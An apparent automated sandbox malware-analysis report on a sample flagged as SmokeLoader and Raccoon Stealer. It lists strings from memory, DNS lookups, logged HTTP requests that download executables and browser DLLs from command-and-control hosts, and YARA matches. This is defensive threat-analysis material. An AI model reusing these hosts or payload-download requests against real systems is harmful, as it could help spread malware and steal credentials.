HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Aug 2021 06:49:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=3Vary: Accept-EncodingData Raw: 33 66 66 36 36 0d 0a 19 00 00 00 0f ca 2f 84 77 38 03 07 60 d2 80 a2 bd 69 d9 2a 54 11 f9 3f 11 11 69 c6 03 00 ca e6 04 00 01 d0 ea 5b 01 07 01 00 09 00 9c 03 00 00 9f 24 2b 84 9b 15 0f 1b 8d 31 3e 1f 89 00 1a 00 9a 9e 36 eb 35 c6 1f 1b 28 74 b4 ea e8 ba a8 25 a8 83 82 1b 73 98 df ea a8 d4 7e 16 a7 ef 2c 3e c2 32 14 ea be ef 24 3e 44 3a 13 90 7d 7e 96 3b 32 55 c2 af b2 7b 11 87 ff 09 93 b8 0e 89 4b 95 cb 9a bb 7e 96 48 44 e1 80 c2 33 8f c5 d0 d9 53 6d 17 df f2 e8 40 70 c8 8c 5b a2 7d 08 fb 77 ac b1 da 74 68 df 2b 53 27 b4 4d 72 56 b6 6f 03 90 e0 b7 2e bd 97 54 51 d0 24 c3 4a ff 42 97 9f a3 7e 79 5d 43 0d c5 83 80 6a 74 a6 9b 8d 69 d5 01 98 3e 25 7d c0 5c 60 26 0e 9f 7d 03 0a f7 f8 bd 9a 54 e0 ee 28 f7 34 f4 2f d0 8c 1e 0c 81 10 65 a1 bd 57 6f a5 98 bb b7 84 ef a1 b2 95 45 71 c2 0e c2 db ce de df 0d 32 48 57 a1 05 14 7e e4 f3 6d 49 73 a4 95 73 72 7e 2f 8c 8d df bc ae af 30 1b ae 49 95 a1 e1 82 bf c9 5c 5c 1e ea ec be 4a 0e 4d 26 50 4d a1 0f 25 77 b9 78 a7 a3 e4 48 f3 77 68 be 20 f2 7f b2 8b 88 bb 1f a1 28 57 50 e1 f4 60 cb 93 bf 5a 5e 7f 5d 54 b6 04 a6 3f fd 8a 05 83 18 e7 4c 8e d0 16 e2 c2 c8 9c e0 de 7c 62 9d fc 80 0b 82 d3 1a 9a b7 3d 67 c1 c7 09 b0 da 98 f4 df a6 e2 bf 34 64 06 bd cc 4b 23 5d b2 f6 90 1a 5e 08 07 8b e1 b4 d7 b1 87 4f 0a 40 85 48 44 9d 22 6c d2 e4 64 30 e5 28 45 d7 b7 95 6f 44 6d 98 4f f7 24 09 b9 cd c5 78 d4 b9 26 5f fe 35 ae 11 99 71 e2 8e a1 6c 28 f7 8f ef 97 a0 4d 1b 8c b6 b4 d0 76 f4 2c 5b 7d 92 dd 01 a7 1e ec c1 19 e6 ca ca ab 84 31 b4 be c5 d6 c6 2b cc 67 14 cf 59 cb 79 4e c7 cd 9e a3 e0 13 8d 90 65 b7 d2 4c 1f 71 bc 21 5e 7e f5 1b ca a3 a7 59 e4 af f4 03 e1 e7 d4 0c 7d 8f 06 8d 47 10 b0 b5 c5 0a 91 e3 74 92 3b e0 3a 5f 81 e4 ca 30 53 48 2b 7c ce 8f a6 21 61 85 16 7a 1d 4c 83 ed 89 18 08 96 38 8a b2 74 70 5e 90 e5 f0 9a 0e 54 32 1b ff be 50 40 27 48 81 b0 b0 d2 44 2f a9 82 63 2b 40 34 ac e0 5a 84 7c da e9 4e fc 17 5a 66 70 00 11 e3 d1 e2 79 47 1a 8d b4 00 b0 db 14 e8 54 94 38 23 e6 d9 94 3d 42 13 2a f9 af 54 f1 d8 f7 b4 0f 6e c0 03 2b 57 dc da 77 02 5a 65 e0 66 91 02 29 ed b2 cc 4c 8f 21 d3 9c 04 d0 86 e1 7d b9 cc ff ae b5 75 2b c6 8a 7b 79 3e 20 d3 cc ed a9 48 4b 8b 40 dc 74 94 a9 4d 5b ef 95 f5 82 73 8c 44 c1 9f 4a 5d 1d 30 c6 2a 97 99 d4 a2 9c 2c 25 57 d1 39 a6 c5 df ff 04 8e c4 79 3f 20 01 53 02 d1 69 3a 77 0f 2c 71 f4 95 d4 73 ae 8a 22 30 6f 21 40 5b e5 1d b6 7c 14 52 ba 02 65 cc f4 45 93 f6 4f f6 e6 e2 57 c7 20 13 ea dc 43 ab dc ba f5 a4 04 99 c9 71 fd a8 17 1e 54 40 8e 8c 73 90 f5 b5 c0 f6 c4 5a d8 ce f7 9a 4b 90 ec ea 10 27 d9 62 02 b7 d2 5a bb 08 fb 19 27 87 f0 12 4e e0 4a 1a 46 c4 09 d9 cb a1 b9 27 d8 1d 95 7a c6 78 12 a8 2e fd 61 dd 7f ed 3e a2 8d f3 ae bd a3 b6 67 0c ac ee 95 f1 13 a2 1a c3 3d fe 66 ca 45 34 c6 65 67 ca 4c 79 d1 f1 b4 74 8d 7e e3 da b7 8a 9c 02 dd e5 f6 5f c8 f9 c6 61 bc a

Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: http://188.119.112.104/
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: http://188.119.112.104/-
Source: 49B.exe, 00000016.00000002.646166014.0000000003030000.00000004.00000001.sdmp	String found in binary or memory: http://188.119.112.104//l/f/SRCFdHsBPvGyIjkLejU_/259f84897d08382fc97b5383558dbe35eed6ef86
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: http://188.119.112.104//l/f/SRCFdHsBPvGyIjkLejU_/cbe8b35942fedca555bc8bd12e2be781ce7cfcff
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: http://188.119.112.104//l/f/SRCFdHsBPvGyIjkLejU_/cbe8b35942fedca555bc8bd12e2be781ce7cfcff0
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: http://188.119.112.104//l/f/SRCFdHsBPvGyIjkLejU_/cbe8b35942fedca555bc8bd12e2be781ce7cfcff41
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: http://188.119.112.104//l/f/SRCFdHsBPvGyIjkLejU_/cbe8b35942fedca555bc8bd12e2be781ce7cfcff7
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: http://188.119.112.104//l/f/SRCFdHsBPvGyIjkLejU_/cbe8b35942fedca555bc8bd12e2be781ce7cfcffftd
Source: 49B.exe, 00000016.00000002.646166014.0000000003030000.00000004.00000001.sdmp	String found in binary or memory: http://188.119.112.104/v2
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0Y
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: 49B.exe, 00000016.00000000.448155898.0000000003018000.00000004.00000001.sdmp	String found in binary or memory: http://realete.in/
Source: svchost.exe, 00000005.00000002.621112588.000002A5C12AD000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: svchost.exe, 00000005.00000002.621112588.000002A5C12AD000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/
Source: svchost.exe, 00000005.00000002.621112588.000002A5C12AD000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration
Source: B72.exe	String found in binary or memory: http://secureteam.net/ErrorReporting.asmx
Source: B72.exe, 00000017.00000000.382925892.0000000000E62000.00000002.00020000.sdmp	String found in binary or memory: http://secureteam.net/webservices/CreateErrorReport
Source: B72.exe, 00000017.00000000.382925892.0000000000E62000.00000002.00020000.sdmp	String found in binary or memory: http://secureteam.net/webservices/T
Source: B72.exe, 00000017.00000000.382925892.0000000000E62000.00000002.00020000.sdmp	String found in binary or memory: http://secureteam.net/webservices/TU
Source: B72.exe, 00000017.00000000.382925892.0000000000E62000.00000002.00020000.sdmp	String found in binary or memory: http://secureteam.net/webservices/Y
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: svchost.exe, 0000000B.00000002.311703876.0000026037213000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: svchost.exe, 00000009.00000002.585721749.000001FB9E444000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000009.00000002.585721749.000001FB9E444000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: svchost.exe, 00000009.00000002.585721749.000001FB9E444000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000009.00000002.585721749.000001FB9E444000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.comr
Source: B72.exe, 00000017.00000002.638343720.0000000001640000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: svchost.exe, 0000000B.00000003.311171598.0000026037261000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000009.00000002.582772887.000001FB9E429000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000009.00000002.582772887.000001FB9E429000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000B.00000003.311204300.000002603725A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.311204300.000002603725A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.311171598.0000026037261000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.311757833.000002603723D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.311204300.000002603725A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000B.00000003.311171598.0000026037261000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000002.311781895.000002603724E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000B.00000003.311204300.000002603725A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.311171598.0000026037261000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.311757833.000002603723D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.311171598.0000026037261000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000B.00000003.311171598.0000026037261000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000B.00000003.311171598.0000026037261000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000B.00000003.311291629.0000026037241000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000B.00000003.311291629.0000026037241000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000B.00000003.311171598.0000026037261000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000003.311236895.0000026037240000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000B.00000003.311204300.000002603725A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000003.311204300.000002603725A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000003.311204300.000002603725A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000002.311781895.000002603724E000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.311204300.000002603725A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000B.00000003.311171598.0000026037261000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.311757833.000002603723D000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.289477965.0000026037232000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: svchost.exe, 0000000B.00000002.311757833.000002603723D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.311703876.0000026037213000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000003.289477965.0000026037232000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000003.311258325.0000026037245000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.289477965.0000026037232000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000B.00000002.311751818.000002603723B000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000B.00000002.311781895.000002603724E000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	String found in binary or memory: https://telete.in/org/img/t_logo.png
Source: 49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp, 49B.exe, 00000016.00000002.645248645.0000000003023000.00000004.00000001.sdmp	String found in binary or memory: https://telete.in/xylichanjk

Source: unknown

DNS traffic detected: queries for: readinglistforaugust1.xyz

Source: C:\Users\user\AppData\Local\Temp\E61.exe

Code function: 25_2_0040B048 __EH_prolog3_GS,DeleteUrlCacheEntry,DeleteUrlCacheEntry,DeleteUrlCacheEntry,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

25_2_0040B048

Source: global traffic	HTTP traffic detected: GET /reestr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: GET /raccon.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: GET /@Rarenut0.exe HTTP/1.1Host: swretjhwrtj.gqConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /5.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.49.70.90:2080
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //l/f/SRCFdHsBPvGyIjkLejU_/259f84897d08382fc97b5383558dbe35eed6ef86 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 188.119.112.104

Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727

Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: readinglistforaugust3.xyz

Source: unknown	HTTPS traffic detected: 74.114.154.18:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.5:49727 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 00000027.00000002.601848015.0000000002DA1000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.559576605.0000000000371000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.GzsKHwvBmG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.GzsKHwvBmG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.hhiwwui.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.hhiwwui.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.308302159.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.370106041.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.308352184.00000000006A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.370292791.00000000005E1000.00000004.00000001.sdmp, type: MEMORY

Source: hhiwwui, 00000011.00000002.361083562.0000000002F2B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 22.0.49B.exe.4920e50.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.20.raw.unpack, type: UNPACKEDPE
